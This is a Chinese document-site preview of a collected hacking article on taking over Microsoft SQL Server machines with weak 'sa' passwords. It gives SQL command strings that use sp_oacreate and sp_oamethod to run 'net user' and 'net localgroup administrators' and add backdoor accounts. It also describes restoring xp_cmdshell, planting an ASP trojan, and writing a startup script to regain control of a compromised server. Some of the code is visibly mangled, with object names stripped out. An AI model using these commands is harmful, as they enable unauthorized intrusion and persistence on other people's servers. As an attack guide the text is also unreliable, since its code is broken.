下载此文档

完全终结sa(网上收集.pdf


文档分类:通信/电子 | 页数:约19页 举报非法文档有奖
1/19
下载提示
  • 1.该资料是网友上传的,本站提供全文预览,预览什么样,下载就什么样。
  • 2.下载该文档所得收入归上传者、原创者。
  • 3.下载的文档,不会出现我们的网址水印。
1/19 下载此文档
文档列表 文档介绍
: .
完全终结sa(网上收集)
疯狂代码 http:能
啊)那么利用您查询分析器所有sa弱口令机器都可以控制咯!
比如我给他添加个用户!
declare ***@shell exec sp_oacreate '',***@shell output exec sp_oamethod
***@shell,'run',null,'c:\winnt\system32\ /c net user gchn aaa /add'--


ok,郑重声明如果您用来搞破坏那后果自负哦同时也不是我希望我只是希望大家把平时点心得体会拿出来交流那
我们水平会提高很快啊

最后欢迎各位大虾批评指正



深夜了好友“如影随行”突然发来消息说他台配置非常好3389肉鸡飞了以前他是从WEB页面注入入手然后直接用Xp_cmdshell添加系统用户搞定可晚上用3389登陆时突然发现添加用户不在了安装后门都被清理干净连
Xp_cmdshell也执行不了朋友叫我帮忙看看这样和管理员直接攻防较量我还没尝试过所以也就答应了!  是
数据库是SA权限连接我首先想到是利用下面命令: exec renwoxin 我目是添加数据库
用户“renwoxin”然后将将其加入“Sysadmin”组: Exec
renwoxin,sysadmin 然后就可以用祭出我们“屠库宝刀”——SQL查询分析器了开始我还抱着丝侥幸希望可以
通过: sp_addextendedproc

Xp_cmdshell,***@dllname='' 添加Xp_cmdshell扩展过程可惜SQL输出如下:数据库中
已存在名为Xp_cmdshell 对象为了确认Xp_cmdshell是否被删除我提交如下语句: select count(*) from
where xtype='X' and name=Xp_cmdshell 返回1看来并未删除

GetWebShell来写入ASP木马工具使用很简单以往黑防也有介绍过我使用后会儿就提示写入成功了但等我高高
兴兴去访问这个路径时却提示“找不到网页”郁闷!  百思不得其解拿出NBSI2利用Tree list工具列出
WEB路径下文件发现上传木马“安详”地躺在那儿可为什么不能访问呢(我现在都还不知道答案哪位高人知道希
望能指点下)而且提示居然是“找不到文件”?!我打算放弃了可这么好肉鸡就这么飞了实在心有不甘!到百度
通狂搜终于找到篇文章文中提出了种思路方法用SQL查询分析器写入如下指令: Declare ***@o , ***@f , ***@t , ***@ret
,***@a exec sp_oacreate ’’, ***@o out ——这两行代码是建立SQL文本对象 exec
sp_oamethod ***@o, ’createtextfile’, ***@f out,’c:\docume~1\alluse~1\「开始」菜单\\启动\’, 1
-- exec ***@ret = sp_oamethod ***@f, ’writeline’, NULL,’
wshshell=createobject("")’ —— exec ***@ret =
sp_oamethod ***@f, ’writeline’, NULL,’a= (" /c net user user1 123 /add",0)’
exec ***@ret = sp_oamethod ***@f, ’writeline’, NULL,’b= (" /c net localgroup
administrators user1 /add",0)’ --

完全终结sa(网上收集 来自淘豆网m.daumloan.com转载请标明出处.

相关文档 更多>>
非法内容举报中心
文档信息
  • 页数19
  • 收藏数0 收藏
  • 顶次数0
  • 上传人q1188830
  • 文件大小286 KB
  • 时间2022-02-21